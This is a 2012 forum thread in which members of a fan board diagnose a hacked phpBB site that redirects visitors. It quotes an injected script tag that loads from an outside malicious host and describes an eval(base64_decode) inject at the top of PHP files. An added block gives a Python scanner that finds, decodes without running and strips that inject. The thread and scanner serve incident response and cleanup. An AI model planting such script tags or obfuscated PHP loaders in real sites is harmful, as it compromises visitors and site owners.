
Forum hacked?

Post problems and requests to the UY Dojo here. Requests include something you'd like to appear on the UY Dojo: Story synopses, Character descriptions, etc.

Moderators: Steve Hubbell, Mayhem, Moderators

Postby Mayhem » Thu Mar 01, 2012 14:43 +0000

Pinging up the index.php source in IE8 (yes, it tried to redirect when I used that browser) reveals this at the bottom of the code:

<script src="http://sbulle06tsconti.rr.nu/nl.php?p=d"></script>

Googling that URL pulls up just one hit online for a compromise at Dreamhost:

http://community.mybb.com/thread-114345.html

Which then leads to this thread:

http://discussion.dreamhost.com/thread-134262.html

Is the Usagi Dojo on Dreamhost? If so, it might explain something. The HTACCESS file might need looking at as well.
With a breeze comes a storm, but then you'll all be washed away...
Mayhem
Daimyo <High-Ranking Lord>
 
Posts: 2782
Joined: Wed Sep 18, 2002 3:54 +0000
Location: London, England

Postby Stormhaven » Thu Mar 01, 2012 15:35 +0000

I ran into something similar a while back on a domain I was running. I'm guessing the phpBB that the dojoboard is running is probably a few revs behind. There have been quite a few security exploits with the older versions. I had to have the host provider run a grep to find all the files with the domain inserts and manually repair them.
Stormhaven
Shugyosha<Student Warrior>
 
Posts: 34
Joined: Sun Mar 09, 2003 2:51 +0000

Postby Todd Shogun » Thu Mar 01, 2012 15:44 +0000

I use Firefox and no problems... I will see what I can do!

And yes, Dreamhost does host us
Todd Shogun
Shogun
 
Posts: 1908
Joined: Fri Sep 20, 2002 12:43 +0000
Location: Orange Co., California

Postby Todd Shogun » Thu Mar 01, 2012 16:23 +0000

Ugh...it looks messy. This will be time-consuming. Any phpBB-savvy Members out there willing to help?
Todd Shogun
Shogun
 
Posts: 1908
Joined: Fri Sep 20, 2002 12:43 +0000
Location: Orange Co., California

Postby maichan » Thu Mar 01, 2012 22:11 +0000

Wow, sounds serious. Hope you can get it fixed Todd!

@Stormhaven - on your advice I'm on Firefox now without any problems.
My home computer info:
Internet Explorer 9.0.8112.16421 - redirects
Firefox 10.0.2 - Does not redirect
Michael, a.k.a., Maichan

My Usagi Collection
maichan
Hatamoto<Special Retainer>
 
Posts: 1914
Joined: Fri Jul 22, 2011 23:04 +0000
Location: A little Minka, somewhere in the countryside...

Postby Stan Sakai » Fri Mar 02, 2012 7:57 +0000

I heard from Thomas. He has tried getting to the Dojo, but was redirected every time. I gave him the tip about using Firefox. Hopefully, that will work for him.

I've been redirected a couple of times, but not to the extent that others on this board have experienced. I use a Mac computer and Safari.
Stan Sakai
Sensei
 
Posts: 4765
Joined: Wed Sep 18, 2002 12:21 +0000

Postby Mayhem » Fri Mar 02, 2012 8:16 +0000

It does appear to be only IE, and perhaps Safari, affected. My brother and I tried different versions of IE and Firefox, and no Firefox version got redirected. All the IE browsers did.
With a breeze comes a storm, but then you'll all be washed away...
Mayhem
Daimyo <High-Ranking Lord>
 
Posts: 2782
Joined: Wed Sep 18, 2002 3:54 +0000
Location: London, England

Postby Stormhaven » Fri Mar 02, 2012 8:43 +0000

Todd, I don't know PHP but when I had to deal with this, I just manually removed the bits from the HTML. If you just need help doing that, feel free to contact me.
Stormhaven
Shugyosha<Student Warrior>
 
Posts: 34
Joined: Sun Mar 09, 2003 2:51 +0000

Postby digulla » Sun Mar 04, 2012 14:19 +0000

I cleaned the PHP code but the job was probably done with a script (i.e. it's an automated attack).

The board itself is still vulnerable so it's just a question of time until it happens again.

Edit: The virus made two changes:

1. There was a file .log/log1.txt which contains the list of sites to redirect to.

2. At the start of each .php file, there was code like this: <?php /**/ eval(base64_decode("...."))

I'm not sure what this code did, my guess is that it kept the file above up to date plus it probably injected the code for the redirection into the HTML.

I kept the files just in case we want to analyze this further.
Last edited by digulla on Sun Mar 04, 2012 14:32 +0000, edited 1 time in total.
Aaron Digulla a.k.a. Philmann Dark
"It's not the universe that's limited, it's our imagination.
Follow me and I'll show you something beyond the limits."
http://www.philmann-dark.de/
digulla
Daimyo <High-Ranking Lord>
 
Posts: 285
Joined: Mon Aug 12, 2002 13:01 +0000
Location: Zurich, Switzerland
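
An added example, not part of digulla's post or the Dojo's code: a scanner for the two artifacts described above (the `eval(base64_decode(...))` prefix at the start of `.php` files and the `.log/log1.txt` file) that decodes the payload for inspection without running it and strips the prefix while keeping a copy. The closing `;?>` after the inject, the function names and the sample payload are assumptions constructed for the example.

```python
import base64
import re
import tempfile
from pathlib import Path

# Prefix shape from the thread: <?php /**/ eval(base64_decode("....")) at file start.
# ASSUMPTION: the inject ends with ";?>" before the file's real code begins.
INJECT_RE = re.compile(
    rb'\A\s*<\?php\s*/\*\*/\s*eval\(\s*base64_decode\(\s*'
    rb'["\']([A-Za-z0-9+/=\s]*)["\']\s*\)\s*\)\s*;?\s*\?>')

def decoded_payload(data):
    """Return the base64-decoded payload (decoded only, never run), or None."""
    m = INJECT_RE.match(data)
    return base64.b64decode(b"".join(m.group(1).split())) if m else None

def scan(root):
    """Return ({infected .php file: decoded payload}, whether .log/log1.txt exists)."""
    root = Path(root)
    found = {p.relative_to(root).as_posix(): decoded_payload(p.read_bytes())
             for p in sorted(root.rglob("*.php")) if p.is_file()}
    hits = {name: body for name, body in found.items() if body is not None}
    return hits, (root / ".log" / "log1.txt").is_file()

def clean(path):
    """Strip the injected prefix; keep the original as <name>.infected for analysis."""
    path = Path(path)
    data = path.read_bytes()
    m = INJECT_RE.match(data)
    if m:
        path.with_name(path.name + ".infected").write_bytes(data)
        path.write_bytes(data[m.end():])
    return bool(m)

def demo():
    """Scan and clean a constructed two-file tree; return before/after results."""
    blob = base64.b64encode(b"/* constructed placeholder, not the real payload */")
    original = b"<?php echo 'board index'; ?>\n"
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / ".log").mkdir()
        (root / ".log" / "log1.txt").write_text("constructed-entry\n")
        inject = b'<?php /**/ eval(base64_decode("' + blob + b'"));?>'
        (root / "index.php").write_bytes(inject + original)
        (root / "faq.php").write_bytes(original)
        before = scan(root)
        cleaned = clean(root / "index.php")
        return before, cleaned, scan(root), (root / "index.php").read_bytes()
```

Files that contain `eval(base64_decode(` in some other shape will not match this pattern and need a manual look.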

Postby Mayhem » Sun Mar 04, 2012 14:23 +0000

Do you think a shift to phpBB 3 would help here? We are running quite an ancient version of 2 on the Dojo.
With a breeze comes a storm, but then you'll all be washed away...
Mayhem
Daimyo <High-Ranking Lord>
 
Posts: 2782
Joined: Wed Sep 18, 2002 3:54 +0000
Location: London, England

Postby digulla » Sun Mar 04, 2012 14:29 +0000

Mayhem wrote: Do you think a shift to phpBB 3 would help here? We are running quite an ancient version of 2 on the Dojo.


Yes. I just never had the time to make the update.
Aaron Digulla a.k.a. Philmann Dark
"It's not the universe that's limited, it's our imagination.
Follow me and I'll show you something beyond the limits."
http://www.philmann-dark.de/
digulla
Daimyo <High-Ranking Lord>
 
Posts: 285
Joined: Mon Aug 12, 2002 13:01 +0000
Location: Zurich, Switzerland

Postby digulla » Sun Mar 04, 2012 14:39 +0000

Aaron Digulla a.k.a. Philmann Dark
"It's not the universe that's limited, it's our imagination.
Follow me and I'll show you something beyond the limits."
http://www.philmann-dark.de/
digulla
Daimyo <High-Ranking Lord>
 
Posts: 285
Joined: Mon Aug 12, 2002 13:01 +0000
Location: Zurich, Switzerland

Postby toine » Tue Mar 06, 2012 17:27 +0000

digulla wrote: I cleaned the PHP code but the job was probably done with a script (i.e. it's an automated attack).

The board itself is still vulnerable so it's just a question of time until it happens again.


I just have been redirected... :?

(Chrome under Ubuntu 11.10)
***************************************

"The future is unwritten, know your rights"

The Clash

***************************************
toine
Shugyosha<Student Warrior>
 
Posts: 30
Joined: Tue Apr 05, 2005 9:16 +0000
Location: Peterborough ON

Me, too....

Postby go » Tue Mar 06, 2012 17:33 +0000

Dear Readers,
I just got redirected using Firefox.
Best wishes to all!
go
go
Shinobi<Special Ninja Agent>
 
Posts: 1522
Joined: Wed Sep 18, 2002 17:19 +0000

Postby Mayhem » Tue Mar 06, 2012 21:35 +0000

Hmmm, somewhat worrying, but no redirect here for me.
With a breeze comes a storm, but then you'll all be washed away...
Mayhem
Daimyo <High-Ranking Lord>
 
Posts: 2782
Joined: Wed Sep 18, 2002 3:54 +0000
Location: London, England
